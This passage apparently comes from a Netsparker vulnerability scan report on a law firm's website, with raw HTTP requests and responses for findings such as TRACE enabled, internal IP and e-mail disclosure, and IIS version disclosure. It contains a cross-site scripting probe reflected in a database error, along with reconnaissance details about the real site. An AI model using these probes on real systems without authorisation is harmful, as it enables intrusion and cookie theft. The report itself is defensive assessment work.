Content-Length: 11237
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSSASTRS=NNLLAMJAOAELHPGIGEDPBEHM; path=/
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="navDefault"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../nr">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_self" href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_blank" href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../terms.htm">terms of use</a></font></td>
</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="images/booksTB.jpg"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
<p align="right" style="margin-right: 10"><b>
<font face="Verdana" size="1" color="#FFFFFF">news/resources</font></b></td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
<p class="class2" align="right"></td>
<td width="48%" height="3">
<font face="Verdana" size="1"><a href="alerts.asp">alerts &amp;
newsletters</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="articles.asp">articles</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="press.asp">press
releases</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="publications.asp">publications</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../glossary/glossary.htm">
glossary of VC &amp; IPO terms</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../blog/governmentcontracts/default.asp">blogs</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../podcast/default.htm">podcasts</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Articles</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
<img border="0" src="images/n.jpg" width="46" height="31"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="211">
<tr>
<td width="52%" height="210" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table width="576" height="85">
<tbody>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber11">
<tr>
<td width="100%">
<table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tbody>
<tr><td colspan=7 color=#000000 bgcolor=#ffff00><tt><b>Database Results Error</b><br><i>Description:</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 554f0bd0<script>alert(document.cookie)</script>ba5591b9a23)'.<br><i>Number:</i> -2147217900 (0x80040E14)<br><i>Source:</i> Microsoft OLE DB Provider for ODBC Drivers<br></tt></td></tr></tbody>
</table>
<p style="margin-left: 100; margin-right: 5">
<a href="javascript:history.go(-1)"><b>
<font face="Verdana" style="font-size: 8.5pt">� </font></b>
<font face="Verdana" style="font-size: 8.5pt">RETURN TO SEARCH RESULTS</font></a></td>
</tr>
</table>
</td>
<td width="12%" valign="top" height="210" class="SubLink" bgcolor="#FFFFFF">
<p align="right">&nbsp;</td>
<td width="5%" valign="top" height="210" bgcolor="#FFFFFF">
<p align="center">
<img border="0" src="images/ews_res.jpg" align="right" width="46" height="455"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#FFFFFF">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="table2" height="41" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="22" class="BodyHover" bgcolor="#FFFFFF" align="center">
<table border="0" width="182" cellspacing="0" cellpadding="0" id="table3" height="22">
<tr>
<td height="22"><a href="http://www.brownrudnick.com/rss/">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Our RSS Feeds" width="17" height="17"></a></td>
<td width="158" class="BodyHover" height="22">
<font face="Verdana" size="1"><a href="../rss/">Subscribe to Our RSS
Feeds</a></font></td>
</tr>
</table></td>
</tr>
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#FFFFFF" align="center">
&nbsp;</td>
</tr>
</table>

</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#000000">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="23" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#000000">
<p align="center">
<font face="Arial,Helvetica,Univers,Zurich BT" color="#999999" size="-2">
Copyright �
<SCRIPT LANGUAGE="JAVASCRIPT">

var d = new Date();
var curr_year = d.getFullYear();
document.write(curr_year);

</SCRIPT>

Brown Rudnick LLP. All Rights Reserved</font></td>
</tr>
</table>

</td>
</tr>
</table>

</td>
<td width="90%" height="590" valign="top">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="228">
<tr>
<td width="100%" height="10" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="33" bgcolor="#C8000A">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="166" bgcolor="#616163">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="19" bgcolor="#4C4C4C">&nbsp;</td>
</tr>
</table>
<p align="right">
&nbsp;</td>
</tr>
</table>

</body>

</html>
TRACE / TRACK Identified

TRACE / TRACK Identified

1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

- /nr/articlesIndv.asp

/nr/articlesIndv.asp CONFIRMED

http://www.brownrudnick.com/nr/articlesIndv.asp?ID=554f0bd0%3Cscript%3Ealert(document.cookie)%3C/scr..

Request

TRACE /nr/articlesIndv.asp?ID=554f0bd0%3Cscript%3Ealert(document.cookie)%3C/script%3Eba5591b9a23 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=LNLLAMJAIINKDENCGHPNPJHH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:55:47 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Type: message/http
Content-Length: 337


TRACE /nr/articlesIndv.asp?ID=554f0bd0%3Cscript%3Ealert(document.cookie)%3C/script%3Eba5591b9a23 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=LNLLAMJAIINKDENCGHPNPJHH
Accept-Encoding: gzip, deflate

[Possible] Internal IP Address Leakage

[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
- /search

/search

http://www.brownrudnick.com/search?q=&site=BRBI_DOM&client=BRBI_DOM&proxystylesheet=BRBI_DOM&output=..

Extracted IP Address(es)

192.168.1.7

Request

GET /search?q=&site=BRBI_DOM&client=BRBI_DOM&proxystylesheet=BRBI_DOM&output=xml_no_dtd&I3=&restrict=Brownrudnick_com HTTP/1.1
Referer: http://www.brownrudnick.com/search/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:56:28 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close,Close
Cache-Control: private
Content-Type: text/html
Content-Length: 5386


<html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title>Search Results: </title><style> <!--body,td,div,.p,a,.d,.s{font-family:arial,sans-serif}body,td,div,.p,a,.d{font-size: }body,div,td,.p,.s{color:#000000}body,.d,.p,.s{background-color:#ffffff}.s{font-size: 80%}.g{margin-top: 1em; margin-bottom: 1em}.s td{width:34em}.l{font-size: }.l{color: #0000cc}a:link,.w,.w a:link{color:#0000cc}.f,.f:link,.f a:link{color:#7777cc}a:visited,.f a:visited{color:#551a8b}a:active,.f a:active{color:#ff0000}.t{color:#000000}.t{background-color:#e5ecf9}.z{display:none}.i,.i:link{color:#a90a08}.a,.a:link{color:#008000}div.n {margin-top: 1ex}.n a{font-size: 10pt; color:#000000}.n .i{font-size: 10pt; font-weight:bold}.q a:visited,.q a:link,.q a:active,.q {color:#0000cc;}.b,.b a{font-size: 12pt; color:#0000cc; font-weight:bold}.d{margin-right:1em; margin-left:1em;}div.oneboxResults {max-height:150px;overflow:hidden;}--></style><script type="text/javascript"> <!-- function resetForms() { for (var i = 0; i < document.forms.length; i++ ) { document.forms[i].reset(); } } //--></script></head> <body onLoad="resetForms()" dir="ltr"> <!-- Please enter html code below. --> <title> International Law Firm | Brown Rudnick Search Results </title> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="3" valign="top"><a href="search?access=p&amp;output=xml_no_dtd&amp;ie=UTF-8&amp;client=BRBI_DOM&amp;site=BRBI_DOM&amp;proxystylesheet=BRBI_DOM&amp;proxycustom=<HOME/&gt;"><img src="http://www.brownrudnick.com/search/images/brsrch.jpg" width="200" height="78" alt="Go to Google Home" border="0"></a>&nbsp;&nbsp;&nbsp; </td> </tr> <tr> <td valign="middle"> <form name="gs" method="GET" action="search"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td> <table cellpadding="4" cellspacing="0"> <tr> <td><font size="-1"><a class="q" onClick="return window.qs?qs(this):1" href="http://www.google.com/search?q="></a></font>&nbsp;&nbsp;&nbsp;&nbsp;<font size="-1"><a class="q" onClick="return window.qs?qs(this):1" href="http://images.google.com/images?q="></a></font>&nbsp;&nbsp;&nbsp;&nbsp;<font size="-1"><a class="q" onClick="return window.qs?qs(this):1" href="http://groups.google.com/groups?q="></a></font>&nbsp;&nbsp;&nbsp;&nbsp;<font size="-1"><a class="q" onClick="return window.qs?qs(this):1" href="http://news.google.com/news?q="></a></font>&nbsp;&nbsp;&nbsp;&nbsp;<font size="-1"><a class="q" onClick="return window.qs?qs(this):1" href="http://local.google.com/local?q="></a></font>&nbsp;&nbsp;&nbsp;&nbsp; <!--trl2--> </td> </tr> </table> </td> </tr> <tr> <td> <table cellpadding="0" cellspacing="0"> <tr> <td valign="middle"><font size="-1"><input type="text" name="q" size="32" maxlength="256" value=""></font></td> <td valign="middle"><font size="-1">&nbsp;<input type="submit" name="btnG" value="Search"></font></td> <td nowrap="1"><font size="-2">&nbsp;&nbsp;<a href="search?access=p&amp;entqr=0&amp;restrict=Brownrudnick_com&amp;output=xml_no_dtd&amp;sort=date%3AD%3AL%3Ad1&amp;ie=UTF-8&amp;client=BRBI_DOM&amp;I3=&amp;q=&amp;ud=1&amp;site=BRBI_DOM&amp;oe=UTF-8&amp;proxystylesheet=BRBI_DOM&amp;ip=192.168.1.7&amp;proxycustom=<ADVANCED/&gt;">Advanced Search</a><br><br></font></td> </tr> </table> </td> </tr> </table> <input type="hidden" name="entqr" value="0"> <input type="hidden" name="restrict" value="Brownrudnick_com"> <input type="hidden" name="output" value="xml_no_dtd"> <input type="hidden" name="sort" value="date:D:L:d1"> <input type="hidden" name="client" value="BRBI_DOM"> <input type="hidden" name="I3" value=""> <input type="hidden" name="ud" value="1"> <input type="hidden" name="oe" value="UTF-8"><input type="hidden" name="ie" value="UTF-8"> <input type="hidden" name="proxystylesheet" value="BRBI_DOM"> <input type="hidden" name="site" value="BRBI_DOM"></form> </td> </tr> </table> <center><br><br><p><font face="arial,sans-serif" size="-1" color="#2f2f2f"> Powered by Google Search Appliance</font></p> </center><span class="p"> <!-- Please enter html code below. --> <p align="center"> <font face="Arial" color="#808080" size="2"> Copyright &copy 2009 Brown Rudnick LLP. All Rights Reserved<br> &nbsp;</font></p></span></body></html>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /glossary/

/glossary/ CONFIRMED

http://www.brownrudnick.com/glossary/

Request

GET /glossary/ HTTP/1.1
Referer: http://www.brownrudnick.com/glossary/glossary.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:55:53 GMT
Connection: close
Content-Type: text/html
Content-Length: 172


<html><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /nr/

/nr/

http://www.brownrudnick.com/nr/

Found E-mails

jmcelhenney@brownrudnick.com

Request

GET /nr/ HTTP/1.1
Referer: http://www.brownrudnick.com/nr/articlesIndv.asp?ID=554f0bd0%3Cscript%3Ealert(document.cookie)%3C/script%3Eba5591b9a23
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Location: http://www.brownrudnick.com/nr/Default.htm
Date: Sat, 16 Apr 2011 14:55:47 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 17:07:03 GMT
ETag: "fcaacdb933eecb1:1911"
Content-Length: 14757


<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - News and Resources</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg" width="758" height="18"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="navDefault"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../nr">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_self" href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_blank" href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../terms.htm">terms of use</a></font></td>
</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="images/booksTB.jpg" width="244" height="178"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
<p align="right" style="margin-right: 10"><b>
<font face="Verdana" size="1" color="#FFFFFF">news/resources</font></b></td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
<p class="class2" align="right"></td>
<td width="48%" height="3">
<font face="Verdana" size="1"><a href="alerts.asp">alerts &amp;
newsletters</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="articles.asp">articles</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="press.asp">press
releases</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="publications.asp">publications</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../glossary/glossary.htm">
glossary of VC &amp; IPO terms</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../blog/governmentcontracts/default.asp">blogs</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../podcast/default.htm">podcasts</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">News/Resources</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg" width="346" height="48"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
<img border="0" src="images/n.jpg" width="46" height="31"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="211">
<tr>
<td width="49%" height="210" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<p style="line-height: 105%; margin-left: 100; margin-right: 5">
<font face="Verdana" style="font-size: 8.5pt">Covering a range of timely
issues and topics of interest, Brown Rudnick attorneys are actively involved
in publishing <a href="articles.asp">articles</a>,
<a href="../blog/governmentcontracts/default.asp">blogs</a>,
<a href="../podcast/">podcasts</a>, developing
<a href="alerts.asp">alerts</a> and authoring various resource
<a href="publications.asp">publications</a>. We also distribute <a href="press.asp">press releases</a>
to national and international media outlets. <br>
&nbsp;</font></p>
<div align="left">
<table border="0" width="383" cellspacing="0" cellpadding="0" id="table1" style="margin-left: 100">
<tr>
<td>
<a href="../blog/governmentcontracts/">
<img border="0" src="../images/blog/blogModWht.jpg" width="17" height="17" alt="Blog"></a></td>
<td width="359"><font face="Verdana" size="1">
<a href="../blog/governmentcontracts/">Read Our
Government Contracts Blog</a></font></td>
</tr>
<tr>
<td>
&nbsp;</td>
<td width="359">&nbsp;</td>
</tr>
<tr>
<td>
<a href="../rss/governmentcontracts.xml" target="_blank">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Government Contracts Blog RSS Feed" width="17" height="17"></a></td>
<td width="359"><font face="Verdana" size="1">
<a target="_blank" href="../rss/governmentcontracts.xml">
Subscribe to RSS Feed to Receive Brown Rudnick's Government
Contracts Blog</a></font></td>
</tr>
<tr>
<td>
&nbsp;</td>
<td width="359">&nbsp;</td>
</tr>
<tr>
<td>
<a href="../podcast">
<img border="0" src="../images/pcastwht.jpg" width="16" height="21" alt="Listen to Our Tax Podcasts"></a></td>
<td width="359"><font face="Verdana" size="1">
<a target="_blank" href="../podcast">Listen to Our Tax Podcasts</a></font></td>
</tr>
<tr>
<td>
&nbsp;</td>
<td width="359">&nbsp;</td>
</tr>
<tr>
<td>
<a href="../rss/podcast.xml" target="_blank">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Tax Podcast RSS Feed" width="17" height="17"></a></td>
<td width="359"><font face="Verdana" size="1">
<a target="_blank" href="../rss/podcast.xml">Subscribe to RSS
Feed to Receive Brown Rudnick's Tax Podcasts</a></font></td>
</tr>
</table>
</div>
<p align="justify" style="margin-left: 88; margin-right:5">
&nbsp;</p>
</td>
<td width="21%" valign="top" height="210" class="SubLink" bgcolor="#FFFFFF">
<table border="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#111111" width="221" id="AutoNumber8" align="right">
<tr>
<td width="232" height="17" align="right" valign="top" style="border-right: 1px solid #F9CD30">
<p style="line-height: 15pt; margin-right: 5" align="right">
<span style="font-weight: 700">
<font face="Verdana" style="font-size: 6.5pt" color="#CF0000">Questions?</font></span></td>
</tr>
<tr>
<td width="232" height="17" align="right" valign="top" style="border-right: 1px solid #F9CD30">
<p style="margin-right: 5" align="right">
<span style="font-weight: 700">
<font face="Verdana" style="font-size: 6.5pt" color="#83807C">
Contact Joanne McElhenney:<br>
</font>
<font face="Verdana" style="font-size: 6.5pt">
<a href="../disc/cntcdisclaimer.asp?ID=458">
jmcelhenney@brownrudnick.com</a></font></span></td>
</tr>
<tr>
<td width="232" height="17" align="right" valign="top" style="border-right: 1px solid #F9CD30">
</td>
</tr>
<tr>
<td width="232" height="17" align="right">
</td>
</tr>
<tr>
<td width="232" height="17" align="right">
</td>
</tr>
<tr>
<td width="232" height="46" align="right"></td>
</tr>
<tr>
<td width="232" height="17" align="right&..
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /nr/articlesIndv.asp

/nr/articlesIndv.asp

http://www.brownrudnick.com/nr/articlesIndv.asp?ID=554f0bd0%3Cscript%3Ealert(document.cookie)%3C/scr..

Extracted Version

Microsoft-IIS/5.0

Request

GET /nr/articlesIndv.asp?ID=554f0bd0%3Cscript%3Ealert(document.cookie)%3C/script%3Eba5591b9a23 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:55:50 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11237
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSSASTRS=NNLLAMJAOAELHPGIGEDPBEHM; path=/
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
